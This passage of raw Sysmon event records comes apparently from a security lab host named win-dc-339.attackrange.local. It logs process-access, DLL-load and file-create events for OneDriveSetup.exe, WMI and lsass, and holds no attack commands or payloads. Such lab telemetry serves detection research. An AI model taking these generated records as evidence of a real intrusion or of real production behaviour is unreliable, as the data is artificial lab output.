Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-DFDC-607E-9209-00000000BB01}3672C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.361{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.361{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.361{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.361{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A8-607E-8605-00000000BB01}2432C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.361{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.361{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-7905-00000000BB01}1224C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.360{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-7605-00000000BB01}4400C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 11241100x800000000000000079736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.344{A7A01FEF-EC13-607E-450E-00000000BB01}3376C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exeC:\Windows\Temp\4D7F90B8-F05F-436A-98BD-2DA9BC03BE8A.txt2021-04-20 14:58:28.344 11241100x800000000000000079735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:58:28.326{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\OneDriveSetup.exe2021-04-20 14:58:28.326 10341000x800000000000000079734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.326{A7A01FEF-B624-607E-0B00-00000000BB01}8602300C:\Windows\system32\lsass.exe{A7A01FEF-EC14-607E-470E-00000000BB01}2240C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.326{A7A01FEF-B624-607E-0B00-00000000BB01}8602300C:\Windows\system32\lsass.exe{A7A01FEF-EC14-607E-470E-00000000BB01}2240C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000079732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.148{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exeC:\Windows\System32\wbem\wbemsvc.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemsvc.dllMD5=2BE97028B7B85762561F475E31989C2A,SHA256=75C9D8C6D41B4B7D70666A8107A08A748CEF6CB9E60AD0288B10CDE12E274AFF,IMPHASH=200200BEAF933FA4627BF83C67BA473EtrueMicrosoft WindowsValid 10341000x800000000000000079731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.293{A7A01FEF-B626-607E-1600-00000000BB01}15406300C:\Windows\system32\svchost.exe{A7A01FEF-EC14-607E-470E-00000000BB01}2240C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000079730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.141{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exeC:\Windows\System32\wbemcomn.dll10.0.14393.4283 (rs1_release.210303-1802)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemcomn.dllMD5=EF7A4C64E4A6F52AEAF20828033ADFF8,SHA256=7108BBAE5B91ED6784BD32547F7BD9DEAD392E47ACAB29DC057AEF7CFB746F3C,IMPHASH=3775C2F7CD09C385EEDA8CBB7894E3E3trueMicrosoft WindowsValid 734700x800000000000000079729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.226{A7A01FEF-EC14-607E-470E-00000000BB01}2240C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbemcomn.dll10.0.14393.4283 (rs1_release.210303-1802)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemcomn.dllMD5=EF7A4C64E4A6F52AEAF20828033ADFF8,SHA256=7108BBAE5B91ED6784BD32547F7BD9DEAD392E47ACAB29DC057AEF7CFB746F3C,IMPHASH=3775C2F7CD09C385EEDA8CBB7894E3E3trueMicrosoft WindowsValid 734700x800000000000000079728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.283{A7A01FEF-EC14-607E-470E-00000000BB01}2240C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbem\wbemprox.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemprox.dllMD5=B7B56FAC395BEEDC20120FD0170A23A3,SHA256=7BDF579D7348D84F251A8411E40E14ADF9406F954914C1C4DE30E880DCF6CEB3,IMPHASH=96416B54C1F2E15EF294753DF1CB4131trueMicrosoft WindowsValid 10341000x800000000000000079727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.280{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC14-607E-470E-00000000BB01}2240C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000079726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.136{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exeC:\Windows\System32\wbem\wbemprox.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemprox.dllMD5=B7B56FAC395BEEDC20120FD0170A23A3,SHA256=7BDF579D7348D84F251A8411E40E14ADF9406F954914C1C4DE30E880DCF6CEB3,IMPHASH=96416B54C1F2E15EF294753DF1CB4131trueMicrosoft WindowsValid 10341000x800000000000000079725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.268{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.186{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC14-607E-470E-00000000BB01}2240C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.186{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC14-607E-470E-00000000BB01}2240C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.177{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 